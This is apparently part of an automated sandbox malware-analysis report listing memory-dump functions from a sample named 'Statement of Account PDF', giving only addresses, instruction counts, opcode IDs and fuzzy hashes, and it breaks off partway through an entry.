                                                        Function 04EEAB02 Relevance: .0, Instructions: 48COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: daf59872ed721c7a811738ecf60ed20555c737450907dd7e742db0c4a8c534ae
                                                        • Instruction ID: 2a714372aeb117d6e51046fa483503a314068e688cb6d694b84f9c403e994d2d
                                                        • Opcode Fuzzy Hash: daf59872ed721c7a811738ecf60ed20555c737450907dd7e742db0c4a8c534ae
                                                        • Instruction Fuzzy Hash: 4B116D74A00209CFEB14EFA6D0547BE7AB2EF84319F14A47DD101AB284DBB85985CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EED0A4 Relevance: .0, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 925d81c3aaba9badd9df89e04c76364d6ff68d6ab1dad6dcc9a0c24d7074af84
                                                        • Instruction ID: e3cd411dba8e48119eaa88666aaae40a5c10ec5a18541d9bea0baded117d3384
                                                        • Opcode Fuzzy Hash: 925d81c3aaba9badd9df89e04c76364d6ff68d6ab1dad6dcc9a0c24d7074af84
                                                        • Instruction Fuzzy Hash: 191125B5D00249CFDB20DF9AD544BDEBBF4EB48324F10845AD559A7210C374A944CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EED050 Relevance: .0, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 02baa8f768ae1caabc6bf78afd793c57c16696cb4cd015364a7f6bab7d799345
                                                        • Instruction ID: c0ec502b7e17f508a3af70712ab1ef31913511324a2464a956ca3a7b2833e2d6
                                                        • Opcode Fuzzy Hash: 02baa8f768ae1caabc6bf78afd793c57c16696cb4cd015364a7f6bab7d799345
                                                        • Instruction Fuzzy Hash: AD1122B5D00249CFDB20DF9AD584BEEBBF4EB48324F20841AD559A7210C374AA44CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE6A08 Relevance: .0, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5fb909324b0cc2873ceea94d173ea5940115a80b2ec30f22773de7088d9474c2
                                                        • Instruction ID: a7425fea7e6647c67f1c14bae90cf389a3ba46ebd62170f7a81371d657ccc26a
                                                        • Opcode Fuzzy Hash: 5fb909324b0cc2873ceea94d173ea5940115a80b2ec30f22773de7088d9474c2
                                                        • Instruction Fuzzy Hash: 6601D432D02A21BBC7349F2AD100275FBA4BF54758B49A22AE49C57A51D730F8F0E7E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE83F0 Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b3f9e01a0cebf623851361944cc3559b21f35ef308d6bd11a8217d44d5ac1941
                                                        • Instruction ID: 60b4f33cf3d54dd47cddb95f33c30f163b95a8777e44f16ef3ffbefffddf822f
                                                        • Opcode Fuzzy Hash: b3f9e01a0cebf623851361944cc3559b21f35ef308d6bd11a8217d44d5ac1941
                                                        • Instruction Fuzzy Hash: 5701443260A3048FDBA9C715D4607A6BBF9EF44224F10446FD00ACB2A2D631E946C791
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEE7A8 Relevance: .0, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 794314ffaa97f6d23cc86af80c40d2371107ba41727fbdeae81199f261282c4f
                                                        • Instruction ID: ffc6aba64706ecffe78da65ca1ae846516cbf156dee261d5586b75ae2f70843c
                                                        • Opcode Fuzzy Hash: 794314ffaa97f6d23cc86af80c40d2371107ba41727fbdeae81199f261282c4f
                                                        • Instruction Fuzzy Hash: 90F0B43674021417FB28627FAC41BBE328A9BC5B14F08803AE609DB2C0CDB9B8428384
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEFAD0 Relevance: .0, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b393c5b80795fe3e8c4c336fe38046ad988bda88b865c60f0ffdd1152e6c48c5
                                                        • Instruction ID: e69ec1e193bd0bc18dab4fe925bc4b279531fdc55aed70de86b213a19d2581e6
                                                        • Opcode Fuzzy Hash: b393c5b80795fe3e8c4c336fe38046ad988bda88b865c60f0ffdd1152e6c48c5
                                                        • Instruction Fuzzy Hash: B9014C31200B504FD724DF2AD544607B7F5FBC4725F108B2DD166477A8DB74A8058F91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEE090 Relevance: .0, Instructions: 40COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2f920b32db4f70e6813edead176a9a439efcba017380bc588eead37b9ed31dab
                                                        • Instruction ID: 718af6f485cd89e7698f6b12e1a9b05dd0a176cb5db35bcfeed7e1c7646e4e42
                                                        • Opcode Fuzzy Hash: 2f920b32db4f70e6813edead176a9a439efcba017380bc588eead37b9ed31dab
                                                        • Instruction Fuzzy Hash: BDF08275ADD6C54FE30696B498A5CE93FE6DAA729030600D7E440CB2B3D9599C83C392
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE8400 Relevance: .0, Instructions: 39COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e09ae5b94cb1d612480fe8c78582350f7a08abca1a83691c372316ad0c988790
                                                        • Instruction ID: 1802a8c34f1c17d137b347716024eb5cd6475b60bc9cc008ccd29725668ab9fe
                                                        • Opcode Fuzzy Hash: e09ae5b94cb1d612480fe8c78582350f7a08abca1a83691c372316ad0c988790
                                                        • Instruction Fuzzy Hash: 8AF0C232605704DFEB64CB16D55076AB7F8EF44314F40493ED50A8B7A4DB71E986C790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE70B7 Relevance: .0, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0f9ed05a67a8dfe546675010d5a784b42d8b7fa60bec9752c831f7dc5973610a
                                                        • Instruction ID: b7ba936067f85b1d58dc713d567f4d6f8a18eede024f098eeadbd0da3c90899c
                                                        • Opcode Fuzzy Hash: 0f9ed05a67a8dfe546675010d5a784b42d8b7fa60bec9752c831f7dc5973610a
                                                        • Instruction Fuzzy Hash: A2F0247391024CAB8F519E948C000E83B70EF06234F008662E9A9DA141D239D620D7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CEF2B8 Relevance: .0, Instructions: 37COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6e7e57447da9a03af0a7173aad9bfc61ca87308854895f91bab12682a065fd0d
                                                        • Instruction ID: 7779d0a9f025d089f1cb24fb68d70403cc742489126ba214d318ffe2f3bcfeca
                                                        • Opcode Fuzzy Hash: 6e7e57447da9a03af0a7173aad9bfc61ca87308854895f91bab12682a065fd0d
                                                        • Instruction Fuzzy Hash: EA01E838E08248CFDB54CFA5D594AADBBB6BF4A301F119059D42AAB366D734AC06CF01
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 074A6808 Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0d390cbbc7c3dd14a55b953f9bef14e1df82e7bf3e03896dd6af8249ea39749a
                                                        • Instruction ID: 889daf354da9e354ddd9fdeb4fe883054c6c322442f2a7b134d17b3f93604395
                                                        • Opcode Fuzzy Hash: 0d390cbbc7c3dd14a55b953f9bef14e1df82e7bf3e03896dd6af8249ea39749a
                                                        • Instruction Fuzzy Hash: 8EF04FB4D1A209EFCB40DFA9D4406EEBBB9FB49300F04A5AAD42993305D7305A01CF41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE8A4F Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 17574d59cd7ac4011ed4bf10a1efd99e8321485b04745be5d77efb180a8de9d3
                                                        • Instruction ID: e4005aadcb0dcc02457f8a39360fd4cd1568b6460acd6d14e69483d540b10b2e
                                                        • Opcode Fuzzy Hash: 17574d59cd7ac4011ed4bf10a1efd99e8321485b04745be5d77efb180a8de9d3
                                                        • Instruction Fuzzy Hash: 840119B4D09249DFCB44DFA9E9046AEBFB5FF49300F0482AAA415E3291D7300B12CB52
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 074AAE20 Relevance: .0, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 48e67ef72e40fcad73aa4d12190bb17e2e16cf2f5208aff864586e8396a0b22b
                                                        • Instruction ID: a793849fda97f0e51830ce5336da25c1fe4a58139421a0deed5e670c664224ac
                                                        • Opcode Fuzzy Hash: 48e67ef72e40fcad73aa4d12190bb17e2e16cf2f5208aff864586e8396a0b22b
                                                        • Instruction Fuzzy Hash: DA01C8B4D00259AFCB44DFA8D4856AEBFF5FB18310F1085AAE954E3341D734AA80CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE2D28 Relevance: .0, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 14772c83823bcc0efaec5768e68148491db3fad52a4d0c361bdd74686cea574b
                                                        • Instruction ID: c34752dc4f8179ce30c26ba1e20501f9baa7a00fba95cf174e1fc6419b21fe71
                                                        • Opcode Fuzzy Hash: 14772c83823bcc0efaec5768e68148491db3fad52a4d0c361bdd74686cea574b
                                                        • Instruction Fuzzy Hash: 31F0B4347503044FDAA59639C84076A33EEEFC5650F04446DC255CB364DEB8EE42D7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 074AA2F8 Relevance: .0, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fdefeaafe175fa2695b36629f004503bc9fafcb45f1da7fac441e7658d1adc0e
                                                        • Instruction ID: df8ba2570e27eff88f3c96a11941eff1ff11ad1f414633d4362a16b3b76d9cd0
                                                        • Opcode Fuzzy Hash: fdefeaafe175fa2695b36629f004503bc9fafcb45f1da7fac441e7658d1adc0e
                                                        • Instruction Fuzzy Hash: 13016674E00208AFCB44DFA9D588A9DBFF2EF48310F15C0A5A5099B365DA34EA40DF41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE8468 Relevance: .0, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f8ec8a44cd408147c688e5a754e6523b65c5a24c393658cf06e1f864ffbbafdb
                                                        • Instruction ID: 20c6d6aa7bf21a235fe766ac225b70c2021ddf9a9df6b3de0ae9ab254421173c
                                                        • Opcode Fuzzy Hash: f8ec8a44cd408147c688e5a754e6523b65c5a24c393658cf06e1f864ffbbafdb
                                                        • Instruction Fuzzy Hash: 93E092623451406B8799626E9C50C7A7FEDEBCB56071680BBF109C7312D9114C0693B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CEBB20 Relevance: .0, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5ddc0f9e0e05ad6c1bb3719191c2b8cc1800f149031a67419874b1cb5aa2f1e0
                                                        • Instruction ID: ba42e79234082a9bb70a29867be8444e9f9cda3cb91e4b4d479c0bc4b167de3f
                                                        • Opcode Fuzzy Hash: 5ddc0f9e0e05ad6c1bb3719191c2b8cc1800f149031a67419874b1cb5aa2f1e0
                                                        • Instruction Fuzzy Hash: 8AF05870D0A2089FCB85CFA8C5406ACBFF1EB49310F1082EA8829D3352D6318A02DB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEA610 Relevance: .0, Instructions: 30COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 625020210eb0c586cac9fc3daae334d5c69093762658e08d44326e1c11bb39b4
                                                        • Instruction ID: 08cceac7176bdd46bbc999df7070434e904944ace77a75c3a8e9949cce23b130
                                                        • Opcode Fuzzy Hash: 625020210eb0c586cac9fc3daae334d5c69093762658e08d44326e1c11bb39b4
                                                        • Instruction Fuzzy Hash: 33E06DB6A4C3978FDB52AE75DD950D47BA0EA7329430500A6C040CF05BE65CA88B8B52
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EECE29 Relevance: .0, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bbb7badac0181ed6d232d080287205b76563b0840bd6792dfcae033680d1a11d
                                                        • Instruction ID: 007fd8f4917792ed7a3335e51d346b3ca3c7488604184a9489de10289b10365c
                                                        • Opcode Fuzzy Hash: bbb7badac0181ed6d232d080287205b76563b0840bd6792dfcae033680d1a11d
                                                        • Instruction Fuzzy Hash: BEE0D876B086046FE705DFAA98404EEBFFADF85564B14C0AAD40CC7206FA356D428351
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEF938 Relevance: .0, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 40666ff8660d67674ce92d5e81b1e088e58c05a4a441992f6e10fe595421db2b
                                                        • Instruction ID: 129f64ebea1a3e8605b36a6e54d141d319c5fe11ea3ce7efd030155d8cf41ae4
                                                        • Opcode Fuzzy Hash: 40666ff8660d67674ce92d5e81b1e088e58c05a4a441992f6e10fe595421db2b
                                                        • Instruction Fuzzy Hash: 53E0D8727982446BD701366B64641DE7F9FDBC66767440066E006C3756DDD94C4343A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EEAB5D Relevance: .0, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cd2c628f48125507974f5daf44351a4f9edb7597848860ffe0719541eb051aee
                                                        • Instruction ID: 4be1049e2a26ed9da1a11f0e923273e5b03b01b73692a23501ad7d31747f4dc7
                                                        • Opcode Fuzzy Hash: cd2c628f48125507974f5daf44351a4f9edb7597848860ffe0719541eb051aee
                                                        • Instruction Fuzzy Hash: D7F03A74A00609CBDB18AFB6D4547AE7AB2EFC4304F05947DC1059B280DFB859818FA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE8A60 Relevance: .0, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9ab1a8fb48d50249ed58d84ae82ede6495709400caa30f2a365da0156dbf067d
                                                        • Instruction ID: c4fda72027db8d8ac44b1a38daf656c11b91c7f43f05b7432729f1d819bd5fc7
                                                        • Opcode Fuzzy Hash: 9ab1a8fb48d50249ed58d84ae82ede6495709400caa30f2a365da0156dbf067d
                                                        • Instruction Fuzzy Hash: F5F0B7B4D05209DFCB44DFAAE9446AEFBF5FB48300F1091AA9819A3350EB345B41CF95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE8E11 Relevance: .0, Instructions: 28COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c311054e216acca135b802cceff97f03cc1161bc9864e728771a6d87f7d1ef6c
                                                        • Instruction ID: 8dda6d22bd3192c39d74a293144a9d5239c698be7dc93dbe116446cd4cae998b
                                                        • Opcode Fuzzy Hash: c311054e216acca135b802cceff97f03cc1161bc9864e728771a6d87f7d1ef6c
                                                        • Instruction Fuzzy Hash: B4E09B715493C59FD7039F619C106A43F31EF5235470800DAD7444F1A3D21A591BC745
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE70C8 Relevance: .0, Instructions: 28COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f2e7b67d91a4c145bc4d7f458831a1e65e61951c8e3ec7bb3ca7936cbb8b1780
                                                        • Instruction ID: 498506de25be5254427d05a297a51cd5828d58b296221c8d7a36f64378ae9c32
                                                        • Opcode Fuzzy Hash: f2e7b67d91a4c145bc4d7f458831a1e65e61951c8e3ec7bb3ca7936cbb8b1780
                                                        • Instruction Fuzzy Hash: 3EF0653291021DEB9F50DE988C055DD3774EF09234F148526F9A9E6140D375E660DBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CEC940 Relevance: .0, Instructions: 28COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 219026265748283d4589fe1d81b0bf1aa0c23a19d09c106a91a26ece529b9b2a
                                                        • Instruction ID: 479c97eec2116cb0a2271886db06be6e63e5dd5815e6c46337e9e27f209186d0
                                                        • Opcode Fuzzy Hash: 219026265748283d4589fe1d81b0bf1aa0c23a19d09c106a91a26ece529b9b2a
                                                        • Instruction Fuzzy Hash: 00F05874E09249DFCB81CFA8D4402ACBBF0EF4A200F1081EAC8A8D3341D6354A42CF41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE5180 Relevance: .0, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 71855164f6962894066a5ad6c2853be1515afad80a1ed713eb678ffce6379666
                                                        • Instruction ID: 730570909ca610d0eb5879479ae412613d4301b62b8f6bcf862d28c10e4c7147
                                                        • Opcode Fuzzy Hash: 71855164f6962894066a5ad6c2853be1515afad80a1ed713eb678ffce6379666
                                                        • Instruction Fuzzy Hash: 20E0ED36640928D7C610DF99F9814B5B3ADE78866D3188556E90CCA691F227D862C780
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE4D31 Relevance: .0, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 47a42875a3f4aa48a10bd145be0d6db8e4b6616bdfdf5ef7adf66c8d3fa5e106
                                                        • Instruction ID: 3c8aa2e5ce0d32f96b1c50025e3409ace09fb3065fbee22790c6c18ea8d43b51
                                                        • Opcode Fuzzy Hash: 47a42875a3f4aa48a10bd145be0d6db8e4b6616bdfdf5ef7adf66c8d3fa5e106
                                                        • Instruction Fuzzy Hash: DAF065F4E482859FD701FFA0E5414DDBFB1EB4221071042A5D805DB219EB365F06D751
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CEBAD8 Relevance: .0, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0f4e973663fd2598fdb59e2f1c9fbfd1e3d1e82320c9a07af4696721e40515ca
                                                        • Instruction ID: 0736c13a22588223ee3cc7004610522df2628638095874a1de969267945d5758
                                                        • Opcode Fuzzy Hash: 0f4e973663fd2598fdb59e2f1c9fbfd1e3d1e82320c9a07af4696721e40515ca
                                                        • Instruction Fuzzy Hash: 8CE0D8B194B108DFDB81DBB695005F93BF9DF47200F1556F6C001C3161D9320E05D712
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE5AA0 Relevance: .0, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 89d2adcd182f5ec9659f86547ffd17ee24aed8d62833240e19cedc750cc51ab5
                                                        • Instruction ID: 22792a56d63a1b3c791e817f2ad0caaa59e26eb463eb8b7fd7b9f83463786380
                                                        • Opcode Fuzzy Hash: 89d2adcd182f5ec9659f86547ffd17ee24aed8d62833240e19cedc750cc51ab5
